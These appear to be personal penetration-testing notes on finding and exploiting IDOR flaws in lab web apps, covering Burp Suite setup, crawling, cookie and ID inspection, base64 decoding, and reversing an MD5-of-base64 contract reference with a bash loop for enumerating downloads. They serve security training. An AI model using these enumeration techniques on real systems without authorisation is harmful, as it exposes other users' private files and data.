Last updated
Last updated
#IDOR identification & testing: Plaint-Text URL Parameter value
root@oco:~$ BROWSER > {targetSite:port}/...
URL parameter: ?uid=1 or ?filename=file_1.pdf
* study the HTTP requests to look for URL parameters or APIs with an object reference
- this may also be found in other HTTP headers, like cookies.
root@oco:~$ BROWSER > {targetSite:port}
URL parameter: ?uid={arbitraryValue} or ?filename=file_{arbitraryValue}.pdf
* try incrementing the values of the object references to retrieve other data#walk the application
root@htb:~$ BROWSER > {targetSite:port}
Services
We provide services to operate manufacturing data such as quotes,
customer requests etc. Please login to get access to the service.
* no visible login page identified#crawl the webapp and conduct directory and page enumeration - either via fuzzing or crawling
#step 1: configure the browser to intercept traffic
root@oco:~$ BROWSER > Settings
Search: Proxy
root@oco:~$ BROWSER > Network Settings > Settings
Configure Proxy Access to the Internet
Manual Proxy Configuration: enabled
HTTP Proxy: 127.0.0.1
Port: 8080 {default Burp listening port}
Also Use this Proxy for HTTPS: enabled
* it is advisable to also check the option of "Also use this proxy for FTP and HTTPS" IOT have all requests go through BurpSuite
step 2: #disable Burp Intercept
root@oco:~$ burpsuite &
BURP > Proxy > Intercept
Intercept is on: disabled
* Burp's intercept is enabled by default
step 3: passively crawl the target site
root@oco:~$ BROWSER > {targetSite:port}
* can also simply refresh the page if already on the target site
step 4: identify pertinent pages in burpsuite
BURP > Target > Site Map > ...
http://10.129.203.93
-> /
-> cdn-cgi
-> login
-> script.js
-> css
-> js
-> themes#identification
root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest
* can also brute force the page
* identify possible entry points on the webapp
- Account page
Access ID Name Email
2233 guest guest@megacorp.com
- Uploads page; this requires admin privileges
root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest > F12 > Storage > Cookies
name value
role guest ...
user 2233 ...
root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest > Account Link
http://10.129.203.93/cdn-cgi/login/admin.php?content=accounts&id=2
* guest account ID is shown...admin id can be enumerated by changing the ID value manually or through automated means#IDOR identification & testing: Base64 encoded
root@oco:~$ BROWSER > {targetSite:port}/...
URL parameter: ?filename=ZmlsZV8xMjMucGRm
root@oco:~$ echo -n "ZmlsZV8xMjMucGRm | base64 -d
file_123.pdf
root@oco:~$ echo file_124.pdf | base64
ZmlsZV8xMjQucGRm
root@oco:~$ BROWSER > {targetSite:port}
URL parameter: ?filename=ZmlsZV8xMjQucGRm#IDOR identification & testing: HASHED
root@oco:~$ BROWSER > {targetSite:port}/...
URL parameter: download.php?filename=c81e728d9d4c2f636f067f89cc14862c
* use a hash identifier
- https://hashes.com/en/tools/hash_identifier
* hashing is a one-way function and can't be reversed#identification - walk the application - carefully examine, test, and analyze how an application works
root@oco:~$ BROWSER > {targetSite:port}
Documents
Contracts
root@oco:~$ BROWSER > {targetSite:port}/documents.php > CTRL+U
<li class="pure-tree_link">...
root@oco:~$ BROWSER > {targetSite:port}/contracts.php > CTRL+U
<li class="pure-tree_link">...
...
javascript:downloadContract('1')
function downloadContract(uid) {
$.redirect("/download.php", {
contract: CryptoJS.MD5(btoa(uid)).toString(),
}, "POST", "_self");
}
* this function sends a POST request with the contract parameter. the value it is sending is an md5 hash using the CryptoJS library.
the value being hashed is btoa(uid), which is the base64 encoded string of the uid variable, which is an input argument for the function.
it is calling downloadContract('1') and the final value being used in the POST request is the base64 encoded string of 1, which was then md5 hashed.
#IDOR identification & testing
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
Request
...
POST /download.php HTTP/1.1
Host: 94.237.62.184:42702
Origin: http://94.237.62.184:42702
Content-Type: application/x-www-form-urlencoded
Referer: http://94.237.62.184:42702/
uid=1
* ALT: on some occassions the data is in an encoded form such as:
- data
- contract=cdd96d3cc73d1dbdaffa03cc6cd7339b
- uid=MQ%3D%3D
- URL
- /download.php?contract=MQ%3D%3D
root@oco:~ echo -n 1 | base64 -w 0 | md5sum | tr -d ' -'
cdd96d3cc73d1dbdaffa03cc6cd7339b
* the -n flag is used to exclude the trailing new line from the output
* the the -w 0 flag with base64 is used to avoid adding newlines
* compare this with the hash on the HTTP request (if used)
#test manual download
root@oco:~$ for i in {1..10}; do echo -n $i | base64 -w 0 | md5sum | tr -d ' -'; done
cdd96d3cc73d1dbdaffa03cc6cd7339b
0b7e7dee87b1c3b98e72131173dfbbbf
0b24df25fe628797b3a50ae0724d2730
f7947d50da7a043693a592b4db43b0a1
8b9af1f7f76daf0f02bd9c48c4a2e3d0
006d1236aee3f92b8322299796ba1989
b523ff8d1ced96cef9c86492e790c2fb
d477819d240e7d3dd9499ed8d23e7158
3e57e65a34ffcb2e93cb545d024f5bde
5d4aace023dc088767b4e08c79415dcd
* compare each output to the values on the Repeater
BURP > Repeater
Request
...
GET /download.php?contract=MQ%3D%3D HTTP/1.1
Host: 94.237.62.184:34855
Referer: http://94.237.62.184:34855/contracts.php
Response
HTTP/1.1 200 OK
Date: Tue, 31 Dec 2024 03:13:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Description: File Transfer
Content-Disposition: attachment; filename="contract_c4ca4238a0b923820dcc509a6f75849b.pdf"
Pragma: public
Content-Type: application/pdf